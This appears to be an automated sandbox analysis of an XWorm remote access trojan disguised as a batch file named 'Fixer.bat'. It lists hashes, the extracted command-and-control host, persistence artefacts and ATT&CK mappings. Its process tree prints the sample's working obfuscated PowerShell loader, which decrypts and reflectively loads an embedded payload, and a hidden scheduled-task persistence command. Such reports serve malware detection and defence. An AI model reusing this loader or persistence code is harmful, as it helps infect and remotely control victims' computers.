xworm | 76a4b894612a0cbd8b0e609a0a83e6da487435f07595f1c76512f6d9b32c7ece

Analysis

max time kernel
149s
max time network
151s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
14/08/2024, 16:40

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Fixer.bat
Size

390KB
MD5

a0814afd89ab12f8cceafb87e245747c
SHA1

c4c7f164b46634e052e1c0cd4cbe8b4a8c93f5d8
SHA256

76a4b894612a0cbd8b0e609a0a83e6da487435f07595f1c76512f6d9b32c7ece
SHA512

2dec24d7212c97dbda471f69abb55581c0f03074d98119f6f59e84ce4a2472eab6b613d09b9bfb58ffa997b606453013cdf9bd738e6067a9a8aec6485a3d340a
SSDEEP

6144:vn/MqOo6Y4c9yAvZXgCiEVISD9Fa4cGWrI/86nA/PReF9edyDLcOBb5+tV:vn/6kAAvFlVISD9FWGW8xiojbQtV

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

dating-mpegs.gl.at.ply.gg:6566

Mutex

hzlnv0DUzbSPOIAL

Attributes

Install_directory
%Userprofile%
install_file
Uni.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/4696-169-0x000001C62DDF0000-0x000001C62DE0C000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	4696	powershell.exe
5	4696	powershell.exe
9	4696	powershell.exe
15	4696	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4636	powershell.exe
4548	powershell.exe
4696	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe"	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-08-14-16-40-21.etl	svchost.exe
File opened for modification	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-08-14-16-40-21.etl	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
4548	powershell.exe
4548	powershell.exe
4548	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3140	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeIncreaseQuotaPrivilege	4548	powershell.exe
Token: SeSecurityPrivilege	4548	powershell.exe
Token: SeTakeOwnershipPrivilege	4548	powershell.exe
Token: SeLoadDriverPrivilege	4548	powershell.exe
Token: SeSystemProfilePrivilege	4548	powershell.exe
Token: SeSystemtimePrivilege	4548	powershell.exe
Token: SeProfSingleProcessPrivilege	4548	powershell.exe
Token: SeIncBasePriorityPrivilege	4548	powershell.exe
Token: SeCreatePagefilePrivilege	4548	powershell.exe
Token: SeBackupPrivilege	4548	powershell.exe
Token: SeRestorePrivilege	4548	powershell.exe
Token: SeShutdownPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeSystemEnvironmentPrivilege	4548	powershell.exe
Token: SeRemoteShutdownPrivilege	4548	powershell.exe
Token: SeUndockPrivilege	4548	powershell.exe
Token: SeManageVolumePrivilege	4548	powershell.exe
Token: 33	4548	powershell.exe
Token: 34	4548	powershell.exe
Token: 35	4548	powershell.exe
Token: 36	4548	powershell.exe
Token: SeIncreaseQuotaPrivilege	4548	powershell.exe
Token: SeSecurityPrivilege	4548	powershell.exe
Token: SeTakeOwnershipPrivilege	4548	powershell.exe
Token: SeLoadDriverPrivilege	4548	powershell.exe
Token: SeSystemProfilePrivilege	4548	powershell.exe
Token: SeSystemtimePrivilege	4548	powershell.exe
Token: SeProfSingleProcessPrivilege	4548	powershell.exe
Token: SeIncBasePriorityPrivilege	4548	powershell.exe
Token: SeCreatePagefilePrivilege	4548	powershell.exe
Token: SeBackupPrivilege	4548	powershell.exe
Token: SeRestorePrivilege	4548	powershell.exe
Token: SeShutdownPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeSystemEnvironmentPrivilege	4548	powershell.exe
Token: SeRemoteShutdownPrivilege	4548	powershell.exe
Token: SeUndockPrivilege	4548	powershell.exe
Token: SeManageVolumePrivilege	4548	powershell.exe
Token: 33	4548	powershell.exe
Token: 34	4548	powershell.exe
Token: 35	4548	powershell.exe
Token: 36	4548	powershell.exe
Token: SeIncreaseQuotaPrivilege	4548	powershell.exe
Token: SeSecurityPrivilege	4548	powershell.exe
Token: SeTakeOwnershipPrivilege	4548	powershell.exe
Token: SeLoadDriverPrivilege	4548	powershell.exe
Token: SeSystemProfilePrivilege	4548	powershell.exe
Token: SeSystemtimePrivilege	4548	powershell.exe
Token: SeProfSingleProcessPrivilege	4548	powershell.exe
Token: SeIncBasePriorityPrivilege	4548	powershell.exe
Token: SeCreatePagefilePrivilege	4548	powershell.exe
Token: SeBackupPrivilege	4548	powershell.exe
Token: SeRestorePrivilege	4548	powershell.exe
Token: SeShutdownPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeSystemEnvironmentPrivilege	4548	powershell.exe
Token: SeRemoteShutdownPrivilege	4548	powershell.exe
Token: SeUndockPrivilege	4548	powershell.exe
Token: SeManageVolumePrivilege	4548	powershell.exe
Token: 33	4548	powershell.exe
Token: 34	4548	powershell.exe
Token: 35	4548	powershell.exe

Suspicious use of WriteProcessMemory 62 IoCs

description	pid	Process	procid_target
PID 3636 wrote to memory of 3668	3636	cmd.exe	74
PID 3636 wrote to memory of 3668	3636	cmd.exe	74
PID 3636 wrote to memory of 4636	3636	cmd.exe	75
PID 3636 wrote to memory of 4636	3636	cmd.exe	75
PID 4636 wrote to memory of 4548	4636	powershell.exe	76
PID 4636 wrote to memory of 4548	4636	powershell.exe	76
PID 4636 wrote to memory of 4868	4636	powershell.exe	79
PID 4636 wrote to memory of 4868	4636	powershell.exe	79
PID 4868 wrote to memory of 3328	4868	WScript.exe	80
PID 4868 wrote to memory of 3328	4868	WScript.exe	80
PID 3328 wrote to memory of 3268	3328	cmd.exe	82
PID 3328 wrote to memory of 3268	3328	cmd.exe	82
PID 3328 wrote to memory of 4696	3328	cmd.exe	83
PID 3328 wrote to memory of 4696	3328	cmd.exe	83
PID 4696 wrote to memory of 3140	4696	powershell.exe	53
PID 4696 wrote to memory of 1864	4696	powershell.exe	35
PID 4696 wrote to memory of 1204	4696	powershell.exe	22
PID 4696 wrote to memory of 1564	4696	powershell.exe	29
PID 4696 wrote to memory of 1212	4696	powershell.exe	23
PID 4696 wrote to memory of 3032	4696	powershell.exe	52
PID 4696 wrote to memory of 744	4696	powershell.exe	10
PID 4696 wrote to memory of 2244	4696	powershell.exe	39
PID 4696 wrote to memory of 2508	4696	powershell.exe	44
PID 4696 wrote to memory of 1124	4696	powershell.exe	20
PID 4696 wrote to memory of 1516	4696	powershell.exe	28
PID 4696 wrote to memory of 2688	4696	powershell.exe	49
PID 4696 wrote to memory of 3868	4696	powershell.exe	65
PID 4696 wrote to memory of 4348	4696	powershell.exe	63
PID 4696 wrote to memory of 2680	4696	powershell.exe	48
PID 4696 wrote to memory of 1692	4696	powershell.exe	31
PID 4696 wrote to memory of 1888	4696	powershell.exe	36
PID 4696 wrote to memory of 900	4696	powershell.exe	13
PID 4696 wrote to memory of 2672	4696	powershell.exe	47
PID 4696 wrote to memory of 1092	4696	powershell.exe	19
PID 4696 wrote to memory of 696	4696	powershell.exe	17
PID 4696 wrote to memory of 1076	4696	powershell.exe	18
PID 4696 wrote to memory of 2060	4696	powershell.exe	38
PID 4696 wrote to memory of 2452	4696	powershell.exe	42
PID 4696 wrote to memory of 2444	4696	powershell.exe	41
PID 4696 wrote to memory of 2640	4696	powershell.exe	45
PID 4696 wrote to memory of 1456	4696	powershell.exe	27
PID 4696 wrote to memory of 1196	4696	powershell.exe	21
PID 4696 wrote to memory of 2436	4696	powershell.exe	40
PID 4696 wrote to memory of 1448	4696	powershell.exe	26
PID 4696 wrote to memory of 856	4696	powershell.exe	12
PID 4696 wrote to memory of 1240	4696	powershell.exe	24
PID 4696 wrote to memory of 1824	4696	powershell.exe	34
PID 4696 wrote to memory of 4428	4696	powershell.exe	62
PID 4696 wrote to memory of 1420	4696	powershell.exe	25
PID 4696 wrote to memory of 1812	4696	powershell.exe	33
PID 4696 wrote to memory of 624	4696	powershell.exe	16
PID 4696 wrote to memory of 1608	4696	powershell.exe	30
PID 4696 wrote to memory of 1016	4696	powershell.exe	15
PID 4696 wrote to memory of 4756	4696	powershell.exe	60
PID 4696 wrote to memory of 812	4696	powershell.exe	11
PID 4696 wrote to memory of 1720	4696	powershell.exe	32
PID 4696 wrote to memory of 2764	4696	powershell.exe	50
PID 812 wrote to memory of 3596	812	svchost.exe	84
PID 812 wrote to memory of 3596	812	svchost.exe	84
PID 812 wrote to memory of 3596	812	svchost.exe	84
PID 812 wrote to memory of 2480	812	svchost.exe	85
PID 812 wrote to memory of 2480	812	svchost.exe	85

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:812
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
  2⤵
  PID:3596
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:2480

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:856

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:1016

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:624

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1076

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1092

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1124

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1196

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1204

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1240

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1516

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1564

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1692

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1824

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1888

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2060

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2436

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2452

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2508

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2672

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2688

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2764

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3032

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/FjeaMBrd7+pIVGQ2ikaLJ5DgqGm5CApZ/z/+dSfY4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cVQUfXgRVANoR8DkOjDhTA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vaSqL=New-Object System.IO.MemoryStream(,$param_var); $YatIx=New-Object System.IO.MemoryStream; $yFHbH=New-Object System.IO.Compression.GZipStream($vaSqL, [IO.Compression.CompressionMode]::Decompress); $yFHbH.CopyTo($YatIx); $yFHbH.Dispose(); $vaSqL.Dispose(); $YatIx.Dispose(); $YatIx.ToArray();}function execute_function($param_var,$param2_var){ $WFyKV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rRSEn=$WFyKV.EntryPoint; $rRSEn.Invoke($null, $param2_var);}$UXnfI = 'C:\Users\Admin\AppData\Local\Temp\Fixer.bat';$host.UI.RawUI.WindowTitle = $UXnfI;$pihvM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UXnfI).Split([Environment]::NewLine);foreach ($impBX in $pihvM) { if ($impBX.StartsWith('bZZxbHbcHvJXiMvEFrGr')) { $XcwdK=$impBX.Substring(20); break; }}$payloads_var=[string[]]$XcwdK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:3668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_392_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_392.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4548
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_392.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4868
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_392.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/FjeaMBrd7+pIVGQ2ikaLJ5DgqGm5CApZ/z/+dSfY4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cVQUfXgRVANoR8DkOjDhTA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vaSqL=New-Object System.IO.MemoryStream(,$param_var); $YatIx=New-Object System.IO.MemoryStream; $yFHbH=New-Object System.IO.Compression.GZipStream($vaSqL, [IO.Compression.CompressionMode]::Decompress); $yFHbH.CopyTo($YatIx); $yFHbH.Dispose(); $vaSqL.Dispose(); $YatIx.Dispose(); $YatIx.ToArray();}function execute_function($param_var,$param2_var){ $WFyKV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rRSEn=$WFyKV.EntryPoint; $rRSEn.Invoke($null, $param2_var);}$UXnfI = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_392.bat';$host.UI.RawUI.WindowTitle = $UXnfI;$pihvM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UXnfI).Split([Environment]::NewLine);foreach ($impBX in $pihvM) { if ($impBX.StartsWith('bZZxbHbcHvJXiMvEFrGr')) { $XcwdK=$impBX.Substring(20); break; }}$payloads_var=[string[]]$XcwdK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:3268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:3868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
aeb24b5729d62e81a27174f46d431126

SHA1
baa02ac3f99822d1915bac666450dc20727494bb

SHA256
d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471

SHA512
e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_edvkl5eo.hgq.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_392.bat

Filesize
390KB

MD5
a0814afd89ab12f8cceafb87e245747c

SHA1
c4c7f164b46634e052e1c0cd4cbe8b4a8c93f5d8

SHA256
76a4b894612a0cbd8b0e609a0a83e6da487435f07595f1c76512f6d9b32c7ece

SHA512
2dec24d7212c97dbda471f69abb55581c0f03074d98119f6f59e84ce4a2472eab6b613d09b9bfb58ffa997b606453013cdf9bd738e6067a9a8aec6485a3d340a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_392.vbs

Filesize
124B

MD5
792ce402f4836d4625ff8cfc4167274a

SHA1
b216b600cb25f98b3622060ea3dff38ea88c765e

SHA256
02a5312761940d6a38e16873ccc3ce509457361c34ea03e023c6b8a541e3f49a

SHA512
c7da0e68d5619204e0a7813466f0bbaaed239f90597ca77d2c48b71dad4e9c2df046e83634d9e0522fd16566ab1e8ee9781351518a345d42fdd9eb710d3adb16

Download Submit
memory/696-235-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/744-232-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/900-223-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/1076-234-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/1092-227-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/1204-218-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/1212-221-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/1456-220-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/1564-225-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/1864-217-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/1888-224-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/2060-230-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/2436-237-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/2444-229-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/2452-228-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/2640-236-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/2672-222-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/3032-233-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/3140-172-0x00000000009E0000-0x0000000000A0A000-memory.dmp

Filesize
168KB

Download
memory/3140-219-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/3868-226-0x00007FFB30A60000-0x00007FFB30A70000-memory.dmp

Filesize
64KB

Download
memory/4548-104-0x00007FFB54CE0000-0x00007FFB556CC000-memory.dmp

Filesize
9.9MB

Download
memory/4548-82-0x00007FFB54CE0000-0x00007FFB556CC000-memory.dmp

Filesize
9.9MB

Download
memory/4548-73-0x00007FFB54CE0000-0x00007FFB556CC000-memory.dmp

Filesize
9.9MB

Download
memory/4548-70-0x00007FFB54CE0000-0x00007FFB556CC000-memory.dmp

Filesize
9.9MB

Download
memory/4636-56-0x00007FFB54CE0000-0x00007FFB556CC000-memory.dmp

Filesize
9.9MB

Download
memory/4636-9-0x00007FFB54CE0000-0x00007FFB556CC000-memory.dmp

Filesize
9.9MB

Download
memory/4636-47-0x000002BE681A0000-0x000002BE68216000-memory.dmp

Filesize
472KB

Download
memory/4636-3-0x00007FFB54CE3000-0x00007FFB54CE4000-memory.dmp

